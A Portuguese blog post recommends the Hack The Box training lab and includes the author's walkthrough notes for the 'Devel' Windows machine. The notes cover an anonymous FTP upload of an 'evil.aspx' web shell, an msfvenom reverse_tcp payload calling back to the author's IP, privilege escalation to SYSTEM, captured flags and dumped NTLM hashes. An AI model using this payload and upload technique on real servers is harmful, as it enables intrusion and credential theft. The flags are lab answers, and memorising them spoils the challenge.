Hack The Box

Há uns meses atrás, conversando com alguns pessoas pelo Twitter sobre o exame de Offensive Security, uma pessoa me indicou o site “https://www.hackthebox.eu”, esse site é uma plataforma gratuita (também tem a versão paga) para testar as habilidades em segurança ofensiva, ou seja, testes de invasão. Existem dezenas de máquinas com vulnerabilidades nesse ambiente, tanto Windows como Linux, todo o acesso é feito via VPN que é disponibilizada pelo site após um cadastro.

O primeiro desafio do Hack The Box é conseguir o invite para se cadastrar, o próprio site avisa que se você não conseguir fazer isso, nem adianta entrar no site pois não vai conseguir comprometer os servidores disponíveis no ambiente.

No Painel principal do site vemos um panorama dos usuários que estão online e o ranking dos melhores colocados em pontuação.

Na parte superior é onde ficam as instruções de como você deve se conectar usando o arquivo de VPN que o site disponibiliza e depois as máquinas vulneraveis que estão ativas no momento no laboratório deles, esse site é ótimo para quem quer testar suas habilidades de invasão e também para aqueles que querem estudar vários ambientes diferentes antes de tentar o exame da Offensive Security, embora a empresa do Kali Linux também tenha seu laboratório particular para treinamento antes da prova.

Na imagem acima, vemos algumas das máquinas que são disponibilizadas pelo Hack The Box, com seu IP (Range 10.10.10.0/24) e seu nível de dificuldade para comprometer o sistema, a invasão deve ser feita em dois passos, primeiro acessar o sistema como usuário comum, achar e ler o conteúdo do arquivo user.txt e depois escalar privilégios de administrador e ler o conteúdo do arquivo root.txt, tanto para ambiente Windows como para ambiente Linux.

Na imagem acima estão alguns estudos que fiz quando estava com mais tempo para poder treinar no ambiente Hack The Box e abaixo estão os arquivos que havia falado anteriormente que é preciso capturar para validar que a invasão do servidor teve sucesso.

É sempre bom ir documentando tudo, principalmente o que foi feito para invadir o sistema, como são muitos servidores, com o tempo você nem vai lembrar mais como invadiu tal servidor.

host        port  proto  name  state  info
----        ----  -----  ----  -----  ----
10.10.10.5  21    tcp          open   
10.10.10.5  80    tcp          open

address     mac  name   os_name    os_flavor  os_sp  purpose  info  comments
-------     ---  ----   -------    ---------  -----  -------  ----  --------
10.10.10.5       DEVEL  Windows 7                    client 

meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows
meterpreter > getuid 
Server username: IIS APPPOOL\Web

shell: evil.aspx
10.10.10.5/evil.aspx
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LPORT=4444 LHOST=10.10.14.158 -f aspx -o evil.aspx

Escalação de privilégios:
Não foi preciso alterar permissões em pastas, fiz a migração do processo do meterpreter para outro processo e consegui acesso
de usuário de sistema:
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

Os arquivos estavam no Desktop dos usuários:
babis 9ecdd6a3aedf24b41562fea70f4cb3e8
Administrator e621a0b5041708797c4fc4728bc72b4b 

meterpreter > hashdump 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a450f6000be7df50ee304d0a838d638f:::
babis:1000:aad3b435b51404eeaad3b435b51404ee:a1133ec0f7779e215acc8a36922acf57:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Vulnerabilidade:
FTP Aberto com usuário anonymous, fiz a inclusão "PUT" do arquivo evil.aspx para 
abrir um backdoor na aplicação.



Abaixo está como a conexão ao ambiente é feita, após o download do arquivo da VPN, basta chamar o mesmo com o comando openvpn.

Interface “tun0” ativada, agora já é possível pingar e acessar todos os servidores da rede do Hack The Box.

Recomendo fortemente o uso desse ambiente para treinamento, principalmente pela presença de servidores Windows, muitos estudantes de segurança e hacking gostam de fazer invasões em ambiente Linux mas esquecem que boa parte do mundo corporativo usa massivamente Windows, para Active Directory, WSUS, Radius e tantos outros serviços e executar uma invasão em um servidor Windows muitas vezes é bem mais complicado que um servidor Linux.